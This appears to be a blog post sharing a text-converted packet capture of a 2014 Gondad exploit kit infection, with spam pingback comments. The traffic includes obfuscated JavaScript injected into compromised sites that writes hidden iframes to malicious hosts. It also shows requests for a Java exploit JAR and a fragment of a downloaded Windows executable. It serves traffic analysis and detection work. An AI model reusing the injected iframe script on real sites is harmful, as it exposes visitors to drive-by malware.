PCAP Converted Traffic Sample Gondad Exploit Kit

By | July 13, 2015

2014-12-13 16:53:26.092318 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [.], ack 1, win 64240, length 0
E..().@…D…..n-.]. .P..u.@. .P…u,……..
2014-12-13 16:53:26.093193 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 1:549, ack 1, win 64240, length 548
E..L).@…A…..n-.]. .P..u.@. .P….j..GET / HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.bing[.]com/search?q=gilsangart[.]com&src=IE-SearchBox&FORM=IE8SRC
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gilsangart[.]com
Connection: Keep-Alive
2014-12-13 16:53:26.093207 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], ack 549, win 64240, length 0
E..(h…..E.n-.]…..P. @. …w.P…s………
2014-12-13 16:53:26.856355 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [P.], seq 1:1370, ack 549, win 64240, length 1369
E…hU….?en-.]…..P. @. …w.P…H…HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15012
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASBDBQQQ=BKCFPKACJCEJGKCIHPPFIKBD; path=/
Cache-control: private

2014-12-13 16:53:28.032272 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 549:935, ack 15258, win 64240, length 386
E…).@…B…..n-.]. .P..w.@.\.P….]..GET /include/flashWrite.js HTTP/1.1
Accept: */*
Referer: http://gilsangart[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gilsangart[.]com
Connection: Keep-Alive
Cookie: ASPSESSIONIDASBDBQQQ=BKCFPKACJCEJGKCIHPPFIKBD
2014-12-13 16:53:28.032466 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], ack 935, win 64240, length 0
E..(h…..D4n-.]…..P. @.\…y=P…5………
2014-12-13 16:53:28.424896 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], seq 15258:16718, ack 935, win 64240, length 1460
E…i…..>^n-.]…..P. @.\…y=P…VB..HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 1392
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Feb 2009 08:22:40 GMT
Accept-Ranges: bytes
ETag: “0c859e7218cc91:3f1″
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 13 Dec 2014 20:53:27 GMT
}
var _$=[‘\x78\x69\x61\x6f\x3d’,’\x78\x69\x61\x6f\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d’,”\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x67\x6f\x6d\x67\x6f\x6d\x69\x2e\x63\x6f\x6d\x2f\x70\x67\x2f\x6b\x63\x70\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x
2014-12-13 16:53:28.424906 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [P.], seq 16718:16942, ack 935, win 64240, length 224
E…i…..C1n-.]…..P. @.b8..y=P…`S..67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e”];if(document.cookie.indexOf(_$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie=_$[1]+a.toGMTString();document.write(_$[2])}

2014-12-13 16:53:28.428838 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 935:1330, ack 16942, win 64240, length 395
E…).@…Bs….n-.]. .P..y=@.c.P…*…GET /images/main03_01.jpg HTTP/1.1
Accept: */*
Referer: http://gilsangart[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gilsangart[.]com
Connection: Keep-Alive
Cookie: ASPSESSIONIDASBDBQQQ=BKCFPKACJCEJGKCIHPPFIKBD; xiao=Yes
2014-12-13 16:53:28.428842 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], ack 1330, win 64240, length 0
E..(i…..D.n-.]…..P. @.c…z.P…-………
2014-12-13 16:53:28.823059 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [P.], seq 16942:18311, ack 1330, win 64240, length 1369
E…i-….>.n-.]…..P. @.c…z.P….B..HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 36144
Content-Type: image/jpeg
Last-Modified: Wed, 11 Feb 2009 08:21:11 GMT
Accept-Ranges: bytes
ETag: “80754db2218cc91:3f1″
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 13 Dec 2014 20:53:28 GMT

……JFIF…..d.d……Ducky…….d……Adobe.d……………………………………………………………………………………………………………………………….n……………………………….
..
……………………….. …………………………!” .1A#2.Q3$.

2014-12-13 16:53:29.605854 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [.], ack 41584, win 64240, length 0
E..();@…C…..n-.]. .P..z.@..ZP………….
2014-12-13 16:53:29.626606 IP 119.205.211.101.80 > 192.168.204.137.49679: Flags [.], seq 1:1461, ack 513, win 64240, length 1460
E…i…….w..e…..P..v]{.!..#P…DZ..HTTP/1.1 404 Not Found
Date: Sat, 13 Dec 2014 20:53:30 GMT
Content-Length: 1466
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01//EN” “http://www.w3.org/TR/html4/strict.dtd”>
<HTML><HEAD><TITLE>…….. …. .. ………</TITLE>
<META HTTP-EQUIV=”Content-Type” Content=”text/html; charset=ks_c_5601-1987″>
<STYLE type=”text/css”>
BODY { font: 9pt/12pt …. }
H1 { font: 13pt/15pt …. }
H2 { font: 9pt/12pt …. }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

2014-12-13 16:53:30.457900 IP 192.168.204.137.49681 > 221.141.1.80.80: Flags [P.], seq 1:517, ack 1, win 64240, length 516
E..,)`@…c\…….P…P.&.6“g{P….0..GET /popup/index.html HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://gilsangart[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.d-mama.co[.]kr
Connection: Keep-Alive

2014-12-13 16:53:30.460901 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 1330:1752, ack 53366, win 63410, length 422
E…)b@…B…..n-.]. .P..z.@..`P…….GET /images/banner.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://gilsangart[.]com/
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: gilsangart[.]com
Connection: Keep-Alive
Cookie: ASPSESSIONIDASBDBQQQ=BKCFPKACJCEJGKCIHPPFIKBD; xiao=Yes
2014-12-13 16:53:30.460906 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], ack 1752, win 64240, length 0
E..(jR….B.n-.]…..P. @..`..|nP………….
2014-12-13 16:53:30.857431 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [P.], seq 53366:54735, ack 1752, win 64240, length 1369
E…j…..=.n-.]…..P. @..`..|nP…u…HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 85503
Content-Type: application/x-shockwave-flash
Last-Modified: Wed, 18 Mar 2009 13:46:34 GMT
Accept-Ranges: bytes
ETag: “01960f3cfa7c91:3f1″
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 13 Dec 2014 20:53:29 GMT

2014-12-13 16:53:30.858857 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [.], ack 62949, win 64240, length 0
E..()z@…C…..n-.]. .P..|n@…P…xp……..
2014-12-13 16:53:30.860068 IP 221.141.1.80.80 > 192.168.204.137.49681: Flags [P.], seq 1:962, ack 517, win 64240, length 961
E…j…..`K…P…..P..“g{.&.:P…….HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:45:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 718
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDSARTC=CJGIIGECCBHIMGDFNCJPPPED; path=/
Cache-control: private

var _$=[‘\x78\x69\x61\x6f\x3d’,’\x78\x69\x61\x6f\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d’,”\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x6e\x67\x68\x77\x61\x73\x75\x2e\x63\x6f\x6d\x2f\x6d\x79\x2f\x62\x79\x34\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e”];if(document.cookie.indexOf(_$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie=_$[1]+a.toGMTString();document.write(_$[2])}

2014-12-13 16:53:31.707864 IP 192.168.204.137.49683 > 211.239.157.117.80: Flags [P.], seq 1:527, ack 1, win 64240, length 526
E..6).@….a…….u…Px.`.Z…P…….GET /my/by4.html HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.d-mama.co[.]kr/popup/index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: songhwasu[.]com
Connection: Keep-Alive

2014-12-13 16:53:32.084319 IP 211.239.157.117.80 > 192.168.204.137.49683: Flags [P.], seq 1:1029, ack 527, win 64240, length 1028
E..,lL………u…..P..Z…x.b.P…~]..HTTP/1.1 200 OK
Content-Length: 778
Content-Type: text/html
Last-Modified: Fri, 12 Dec 2014 09:43:44 GMT
Accept-Ranges: bytes
ETag: “2faf91ef015d01:2cc1d”
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 13 Dec 2014 20:53:32 GMT

2014-12-13 16:53:34.651371 IP 192.168.204.137.49686 > 211.202.2.110.80: Flags [P.], seq 1:534, ack 1, win 64240, length 533
E..=*k@…j……..n…PZ.kBN.d2P…….GET /data/file/cr/index.html HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://songhwasu[.]com/my/by4.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: comm.sansung.org
Connection: Keep-Alive
2014-12-13 16:53:34.651382 IP 211.202.2.110.80 > 192.168.204.137.49686: Flags [.], ack 534, win 64240, length 0
E..(n…..iW…n…..P..N.d2Z.mWP………….
2014-12-13 16:53:35.066302 IP 211.202.2.110.80 > 192.168.204.137.49686: Flags [P.], seq 1:1370, ack 534, win 64240, length 1369
E…nF….c….n…..P..N.d2Z.mWP…m`..HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:30 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
X-Powered-By: PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2014-12-13 16:53:35.532309 IP 192.168.204.137.49687 > 211.202.2.110.80: Flags [P.], seq 1:363, ack 1, win 64240, length 362
E…*.@…k|…….n…P..KV4.4.P…….GET /data/file/cr/swfobject.js HTTP/1.1
Accept: */*
Referer: http://comm.sansung.org/data/file/cr/index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: comm.sansung.org
Connection: Keep-Alive
2014-12-13 16:53:35.532322 IP 211.202.2.110.80 > 192.168.204.137.49687: Flags [.], ack 363, win 64240, length 0
E..(n~….h….n…..P..4.4…L.P…L………
2014-12-13 16:53:35.532412 IP 192.168.204.137.49688 > 211.202.2.110.80: Flags [P.], seq 1:370, ack 1, win 64240, length 369
E…*.@…kt…….n…P(}..=03.P…….GET /data/file/cr/jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Referer: http://comm.sansung.org/data/file/cr/index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: comm.sansung.org
Connection: Keep-Alive
2014-12-13 16:53:35.532418 IP 211.202.2.110.80 > 192.168.204.137.49688: Flags [.], ack 370, win 64240, length 0
E..(n…..h….n…..P..=03.(}..P………….
2014-12-13 16:53:36.004093 IP 211.202.2.110.80 > 192.168.204.137.49688: Flags [P.], seq 1:1370, ack 370, win 64240, length 1369
E…n…..cO…n…..P..=03.(}..P…
…HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:31 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Last-Modified: Sat, 13 Dec 2014 03:08:37 GMT
ETag: “6460129-4dab-548badb5″
Accept-Ranges: bytes
Content-Length: 19883
Connection: close
Content-Type: application/javascript
2014-12-13 16:53:36.819225 IP 192.168.204.137.49692 > 211.202.2.110.80: Flags [P.], seq 1:611, ack 1, win 64240, length 610
E…*.@…jN…….n…P.v.?0l4.P…F6..GET /data/file/cr/main.html HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://comm.sansung.org/data/file/cr/index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: comm.sansung.org
Connection: Keep-Alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes

2014-12-13 16:53:37.246864 IP 211.202.2.110.80 > 192.168.204.137.49692: Flags [P.], seq 1:1370, ack 611, win 64240, length 1369
E…o…..bj…n…..P..0l4..v
.P…….HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:32 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
X-Powered-By: PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2014-12-13 16:53:37.802143 IP 192.168.204.137.49693 > 23.248.253.123.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
E../*.@…,I…….{…P0..G.._.P…z…GET /windos.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 23.248.253.123
Connection: Keep-Alive
2014-12-13 16:53:38.081561 IP 23.248.253.123.80 > 192.168.204.137.49693: Flags [P.], seq 1:230, ack 264, win 64240, length 229
E…p9….’….{…..P…._.0..NP…….HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Sat, 13 Dec 2014 20:53:39 GMT
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Sun, 13 Dec 2014 15:07:04 GMT
Content-Length: 144896
2014-12-13 16:53:38.082517 IP 23.248.253.123.80 > 192.168.204.137.49693: Flags [P.], seq 230:1599, ack 264, win 64240, length 1369
E…p:….”….{…..P….`.0..NP….7..MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$……….m…>…>…>…>…>t..>…>…>…>4..>…>…>…>…>…>…>…>t..>…>…>+..>…>…>_..>…>Rich…>……………………PE..L…..yT……………..p…………… ……..@……………………………6…………………………………….d…….<O……………………………………………………………………………………………..text….s…………………….. ..`.rdata..
………………………@..@.data… …….. ………………@….CRT…………………………..@….rsrc….P…….P………………@..@.adata……. …….&………….. ……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….m.9.O…+.U..?…..n..I…
.?…..XOZ……k.h7.@T.&…..C…..F…{../f.Q8.L……qt…AUX…….bU.R..R….z…..A.x………?..qS.N…..L………….}}..NB.RH.].:.\D..PU.l……yP..lN…..w….#.mDe.S.Z….F.>.R… t..l..?, aU.9….
….aX……\….”…zD…..i2X.YR.Y”`….W..J5./K….$..6..Xq.`…%….G”.. ..E..g&._e8.K…..{.pen..|

2014-12-13 16:53:52.615083 IP 192.168.204.137.49694 > 211.202.2.110.80: Flags [.], ack 1, win 64240, length 0
E..(+.@…k……..n…P..{…<.P….D……..
2014-12-13 16:53:52.622283 IP 192.168.204.137.49694 > 211.202.2.110.80: Flags [P.], seq 1:349, ack 1, win 64240, length 348
E…+.@…jN…….n…P..{…<.P….%..GET /data/file/cr/AyVpSf.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: comm.sansung.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes
2014-12-13 16:53:52.622326 IP 211.202.2.110.80 > 192.168.204.137.49694: Flags [.], ack 349, win 64240, length 0
E..(w….._….n…..P….<…}$P………….
2014-12-13 16:53:53.035237 IP 211.202.2.110.80 > 192.168.204.137.49694: Flags [P.], seq 1:1370, ack 349, win 64240, length 1369
E…x…..Z….n…..P….<…}$P…….HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:48 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Last-Modified: Sat, 13 Dec 2014 03:08:33 GMT
ETag: “6460128-1942-548badb1″
Accept-Ranges: bytes
Content-Length: 6466
Connection: close
Content-Type: text/plain

2014-12-13 16:53:54.476545 IP 192.168.204.137.49696 > 211.202.2.110.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268
E..4+.@…j……..n. .P..uQ ?\.P…t…GET /data/file/cr/edu.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: comm.sansung.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes
2014-12-13 16:53:54.476550 IP 211.202.2.110.80 > 192.168.204.137.49696: Flags [.], ack 269, win 64240, length 0
E..(x…..^….n…..P. ?\…v]P….W……..
2014-12-13 16:53:54.939079 IP 211.202.2.110.80 > 192.168.204.137.49696: Flags [FP.], seq 1:527, ack 269, win 64240, length 526
E..6x…..\….n…..P. ?\…v]P…IG..HTTP/1.1 404 Not Found
Date: Sat, 13 Dec 2014 20:53:50 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

2014-12-13 16:53:55.374435 IP 192.168.204.137.49697 > 211.202.2.110.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268
E..4+.@…j……..n.!.P8\.[/Gt.P…….GET /data/file/cr/net.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: comm.sansung.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes
2014-12-13 16:53:55.374488 IP 211.202.2.110.80 > 192.168.204.137.49697: Flags [.], ack 269, win 64240, length 0
E..(x…..^m…n…..P.!/Gt.8\.gP….i……..
2014-12-13 16:53:55.798179 IP 211.202.2.110.80 > 192.168.204.137.49697: Flags [FP.], seq 1:527, ack 269, win 64240, length 526
E..6y!….\6…n…..P.!/Gt.8\.gP…aX..HTTP/1.1 404 Not Found
Date: Sat, 13 Dec 2014 20:53:50 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

2014-12-13 16:53:56.213820 IP 192.168.204.137.49698 > 211.202.2.110.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268
E..4+.@…j……..n.”.P> ..B K^P…
U..GET /data/file/cr/org.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: comm.sansung.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes
2014-12-13 16:53:56.213860 IP 211.202.2.110.80 > 192.168.204.137.49698: Flags [.], ack 269, win 64240, length 0
E..(yK….^….n…..P.”B K^> ..P…;………
2014-12-13 16:53:56.625624 IP 211.202.2.110.80 > 192.168.204.137.49698: Flags [FP.], seq 1:527, ack 269, win 64240, length 526
E..6yt….[….n…..P.”B K^> ..P…….HTTP/1.1 404 Not Found
Date: Sat, 13 Dec 2014 20:53:51 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

121

Share Button

2 thoughts on “PCAP Converted Traffic Sample Gondad Exploit Kit

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

  2. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *